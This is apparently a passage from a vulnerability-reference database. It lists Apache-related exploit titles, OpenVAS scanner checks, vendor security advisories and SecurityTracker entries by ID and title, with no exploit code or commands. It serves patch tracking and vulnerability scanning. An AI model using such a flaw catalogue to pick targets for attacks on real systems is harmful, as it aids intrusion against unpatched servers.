7061| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
7062| [9] Apache HTTP Server 2.x Memory Leak Exploit
7063|
7064| OpenVAS (Nessus) - http://www.openvas.org:
7065| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
7066| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
7067| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7068| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
7069| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
7070| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7071| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7072| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
7073| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
7074| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
7075| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
7076| [900571] Apache APR-Utils Version Detection
7077| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
7078| [900496] Apache Tiles Multiple XSS Vulnerability
7079| [900493] Apache Tiles Version Detection
7080| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
7081| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
7082| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
7083| [870175] RedHat Update for apache RHSA-2008:0004-01
7084| [864591] Fedora Update for apache-poi FEDORA-2012-10835
7085| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
7086| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
7087| [864250] Fedora Update for apache-poi FEDORA-2012-7683
7088| [864249] Fedora Update for apache-poi FEDORA-2012-7686
7089| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
7090| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
7091| [855821] Solaris Update for Apache 1.3 122912-19
7092| [855812] Solaris Update for Apache 1.3 122911-19
7093| [855737] Solaris Update for Apache 1.3 122911-17
7094| [855731] Solaris Update for Apache 1.3 122912-17
7095| [855695] Solaris Update for Apache 1.3 122911-16
7096| [855645] Solaris Update for Apache 1.3 122912-16
7097| [855587] Solaris Update for kernel update and Apache 108529-29
7098| [855566] Solaris Update for Apache 116973-07
7099| [855531] Solaris Update for Apache 116974-07
7100| [855524] Solaris Update for Apache 2 120544-14
7101| [855494] Solaris Update for Apache 1.3 122911-15
7102| [855478] Solaris Update for Apache Security 114145-11
7103| [855472] Solaris Update for Apache Security 113146-12
7104| [855179] Solaris Update for Apache 1.3 122912-15
7105| [855147] Solaris Update for kernel update and Apache 108528-29
7106| [855077] Solaris Update for Apache 2 120543-14
7107| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
7108| [850088] SuSE Update for apache2 SUSE-SA:2007:061
7109| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
7110| [841209] Ubuntu Update for apache2 USN-1627-1
7111| [840900] Ubuntu Update for apache2 USN-1368-1
7112| [840798] Ubuntu Update for apache2 USN-1259-1
7113| [840734] Ubuntu Update for apache2 USN-1199-1
7114| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
7115| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
7116| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
7117| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
7118| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
7119| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
7120| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
7121| [835253] HP-UX Update for Apache Web Server HPSBUX02645
7122| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
7123| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
7124| [835236] HP-UX Update for Apache with PHP HPSBUX02543
7125| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
7126| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
7127| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
7128| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
7129| [835188] HP-UX Update for Apache HPSBUX02308
7130| [835181] HP-UX Update for Apache With PHP HPSBUX02332
7131| [835180] HP-UX Update for Apache with PHP HPSBUX02342
7132| [835172] HP-UX Update for Apache HPSBUX02365
7133| [835168] HP-UX Update for Apache HPSBUX02313
7134| [835148] HP-UX Update for Apache HPSBUX01064
7135| [835139] HP-UX Update for Apache with PHP HPSBUX01090
7136| [835131] HP-UX Update for Apache HPSBUX00256
7137| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
7138| [835104] HP-UX Update for Apache HPSBUX00224
7139| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
7140| [835101] HP-UX Update for Apache HPSBUX01232
7141| [835080] HP-UX Update for Apache HPSBUX02273
7142| [835078] HP-UX Update for ApacheStrong HPSBUX00255
7143| [835044] HP-UX Update for Apache HPSBUX01019
7144| [835040] HP-UX Update for Apache PHP HPSBUX00207
7145| [835025] HP-UX Update for Apache HPSBUX00197
7146| [835023] HP-UX Update for Apache HPSBUX01022
7147| [835022] HP-UX Update for Apache HPSBUX02292
7148| [835005] HP-UX Update for Apache HPSBUX02262
7149| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
7150| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
7151| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
7152| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
7153| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
7154| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
7155| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
7156| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
7157| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
7158| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
7159| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
7160| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
7161| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
7162| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
7163| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
7164| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
7165| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
7166| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
7167| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
7168| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
7169| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
7170| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
7171| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
7172| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
7173| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
7174| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
7175| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
7176| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
7177| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
7178| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
7179| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
7180| [801942] Apache Archiva Multiple Vulnerabilities
7181| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
7182| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
7183| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
7184| [801284] Apache Derby Information Disclosure Vulnerability
7185| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
7186| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
7187| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
7188| [800680] Apache APR Version Detection
7189| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
7190| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
7191| [800677] Apache Roller Version Detection
7192| [800279] Apache mod_jk Module Version Detection
7193| [800278] Apache Struts Cross Site Scripting Vulnerability
7194| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
7195| [800276] Apache Struts Version Detection
7196| [800271] Apache Struts Directory Traversal Vulnerability
7197| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
7198| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
7199| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
7200| [103122] Apache Web Server ETag Header Information Disclosure Weakness
7201| [103074] Apache Continuum Cross Site Scripting Vulnerability
7202| [103073] Apache Continuum Detection
7203| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
7204| [101023] Apache Open For Business Weak Password security check
7205| [101020] Apache Open For Business HTML injection vulnerability
7206| [101019] Apache Open For Business service detection
7207| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
7208| [100923] Apache Archiva Detection
7209| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
7210| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
7211| [100813] Apache Axis2 Detection
7212| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
7213| [100795] Apache Derby Detection
7214| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
7215| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
7216| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
7217| [100514] Apache Multiple Security Vulnerabilities
7218| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
7219| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
7220| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7221| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7222| [72626] Debian Security Advisory DSA 2579-1 (apache2)
7223| [72612] FreeBSD Ports: apache22
7224| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
7225| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
7226| [71512] FreeBSD Ports: apache
7227| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
7228| [71256] Debian Security Advisory DSA 2452-1 (apache2)
7229| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
7230| [70737] FreeBSD Ports: apache
7231| [70724] Debian Security Advisory DSA 2405-1 (apache2)
7232| [70600] FreeBSD Ports: apache
7233| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
7234| [70235] Debian Security Advisory DSA 2298-2 (apache2)
7235| [70233] Debian Security Advisory DSA 2298-1 (apache2)
7236| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
7237| [69338] Debian Security Advisory DSA 2202-1 (apache2)
7238| [67868] FreeBSD Ports: apache
7239| [66816] FreeBSD Ports: apache
7240| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
7241| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
7242| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
7243| [66081] SLES11: Security update for Apache 2
7244| [66074] SLES10: Security update for Apache 2
7245| [66070] SLES9: Security update for Apache 2
7246| [65998] SLES10: Security update for apache2-mod_python
7247| [65893] SLES10: Security update for Apache 2
7248| [65888] SLES10: Security update for Apache 2
7249| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
7250| [65510] SLES9: Security update for Apache 2
7251| [65472] SLES9: Security update for Apache
7252| [65467] SLES9: Security update for Apache
7253| [65450] SLES9: Security update for apache2
7254| [65390] SLES9: Security update for Apache2
7255| [65363] SLES9: Security update for Apache2
7256| [65309] SLES9: Security update for Apache and mod_ssl
7257| [65296] SLES9: Security update for webdav apache module
7258| [65283] SLES9: Security update for Apache2
7259| [65249] SLES9: Security update for Apache 2
7260| [65230] SLES9: Security update for Apache 2
7261| [65228] SLES9: Security update for Apache 2
7262| [65212] SLES9: Security update for apache2-mod_python
7263| [65209] SLES9: Security update for apache2-worker
7264| [65207] SLES9: Security update for Apache 2
7265| [65168] SLES9: Security update for apache2-mod_python
7266| [65142] SLES9: Security update for Apache2
7267| [65136] SLES9: Security update for Apache 2
7268| [65132] SLES9: Security update for apache
7269| [65131] SLES9: Security update for Apache 2 oes/CORE
7270| [65113] SLES9: Security update for apache2
7271| [65072] SLES9: Security update for apache and mod_ssl
7272| [65017] SLES9: Security update for Apache 2
7273| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
7274| [64783] FreeBSD Ports: apache
7275| [64774] Ubuntu USN-802-2 (apache2)
7276| [64653] Ubuntu USN-813-2 (apache2)
7277| [64559] Debian Security Advisory DSA 1834-2 (apache2)
7278| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
7279| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
7280| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
7281| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
7282| [64443] Ubuntu USN-802-1 (apache2)
7283| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
7284| [64423] Debian Security Advisory DSA 1834-1 (apache2)
7285| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
7286| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
7287| [64251] Debian Security Advisory DSA 1816-1 (apache2)
7288| [64201] Ubuntu USN-787-1 (apache2)
7289| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
7290| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
7291| [63565] FreeBSD Ports: apache
7292| [63562] Ubuntu USN-731-1 (apache2)
7293| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
7294| [61185] FreeBSD Ports: apache
7295| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
7296| [60387] Slackware Advisory SSA:2008-045-02 apache
7297| [58826] FreeBSD Ports: apache-tomcat
7298| [58825] FreeBSD Ports: apache-tomcat
7299| [58804] FreeBSD Ports: apache
7300| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
7301| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
7302| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
7303| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
7304| [57335] Debian Security Advisory DSA 1167-1 (apache)
7305| [57201] Debian Security Advisory DSA 1131-1 (apache)
7306| [57200] Debian Security Advisory DSA 1132-1 (apache2)
7307| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
7308| [57145] FreeBSD Ports: apache
7309| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
7310| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
7311| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
7312| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
7313| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
7314| [56067] FreeBSD Ports: apache
7315| [55803] Slackware Advisory SSA:2005-310-04 apache
7316| [55519] Debian Security Advisory DSA 839-1 (apachetop)
7317| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
7318| [55355] FreeBSD Ports: apache
7319| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
7320| [55261] Debian Security Advisory DSA 805-1 (apache2)
7321| [55259] Debian Security Advisory DSA 803-1 (apache)
7322| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
7323| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
7324| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
7325| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
7326| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
7327| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
7328| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
7329| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
7330| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
7331| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
7332| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
7333| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
7334| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
7335| [54439] FreeBSD Ports: apache
7336| [53931] Slackware Advisory SSA:2004-133-01 apache
7337| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
7338| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
7339| [53878] Slackware Advisory SSA:2003-308-01 apache security update
7340| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
7341| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
7342| [53848] Debian Security Advisory DSA 131-1 (apache)
7343| [53784] Debian Security Advisory DSA 021-1 (apache)
7344| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
7345| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
7346| [53735] Debian Security Advisory DSA 187-1 (apache)
7347| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
7348| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
7349| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
7350| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
7351| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
7352| [53282] Debian Security Advisory DSA 594-1 (apache)
7353| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
7354| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
7355| [53215] Debian Security Advisory DSA 525-1 (apache)
7356| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
7357| [52529] FreeBSD Ports: apache+ssl
7358| [52501] FreeBSD Ports: apache
7359| [52461] FreeBSD Ports: apache
7360| [52390] FreeBSD Ports: apache
7361| [52389] FreeBSD Ports: apache
7362| [52388] FreeBSD Ports: apache
7363| [52383] FreeBSD Ports: apache
7364| [52339] FreeBSD Ports: apache+mod_ssl
7365| [52331] FreeBSD Ports: apache
7366| [52329] FreeBSD Ports: ru-apache+mod_ssl
7367| [52314] FreeBSD Ports: apache
7368| [52310] FreeBSD Ports: apache
7369| [15588] Detect Apache HTTPS
7370| [15555] Apache mod_proxy content-length buffer overflow
7371| [15554] Apache mod_include priviledge escalation
7372| [14771] Apache <= 1.3.33 htpasswd local overflow
7373| [14177] Apache mod_access rule bypass
7374| [13644] Apache mod_rootme Backdoor
7375| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
7376| [12280] Apache Connection Blocking Denial of Service
7377| [12239] Apache Error Log Escape Sequence Injection
7378| [12123] Apache Tomcat source.jsp malformed request information disclosure
7379| [12085] Apache Tomcat servlet/JSP container default files
7380| [11438] Apache Tomcat Directory Listing and File disclosure
7381| [11204] Apache Tomcat Default Accounts
7382| [11092] Apache 2.0.39 Win32 directory traversal
7383| [11046] Apache Tomcat TroubleShooter Servlet Installed
7384| [11042] Apache Tomcat DOS Device Name XSS
7385| [11041] Apache Tomcat /servlet Cross Site Scripting
7386| [10938] Apache Remote Command Execution via .bat files
7387| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
7388| [10773] MacOS X Finder reveals contents of Apache Web files
7389| [10766] Apache UserDir Sensitive Information Disclosure
7390| [10756] MacOS X Finder reveals contents of Apache Web directories
7391| [10752] Apache Auth Module SQL Insertion Attack
7392| [10704] Apache Directory Listing
7393| [10678] Apache /server-info accessible
7394| [10677] Apache /server-status accessible
7395| [10440] Check for Apache Multiple / vulnerability
7396|
7397| SecurityTracker - https://www.securitytracker.com:
7398| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
7399| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
7400| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
7401| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
7402| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
7403| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7404| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7405| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
7406| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
7407| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
7408| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7409| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
7410| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
7411| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
7412| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
7413| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
7414| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
7415| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
7416| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
7417| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
7418| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
7419| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
7420| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
7421| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7422| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
7423| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7424| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
7425| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
7426| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
7427| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
7428| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
7429| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
7430| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
7431| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
7432| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
7433| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
7434| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
7435| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
7436| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
7437| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
7438| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
7439| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
7440| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
7441| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
7442| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
7443| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
7444| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7445| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
7446| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
7447| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
7448| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
7449| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
7450| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
7451| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
7452| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
7453| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
7454| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
7455| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
7456| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
7457| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
7458| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
7459| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
7460| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
7461| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
7462| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
7463| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
7464| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
7465| [1024096] Apache mod_proxy_http May Return Results for a Different Request
7466| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
7467| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
7468| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
7469| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
7470| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
7471| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
7472| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
7473| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
7474| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
7475| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
7476| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
7477| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
7478| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
7479| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7480| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
7481| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
7482| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
7483| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
7484| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
7485| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7486| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
7487| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
7488| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
7489| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
7490| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
7491| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
7492| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
7493| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
7494| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
7495| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
7496| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
7497| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
7498| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
7499| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
7500| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
7501| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
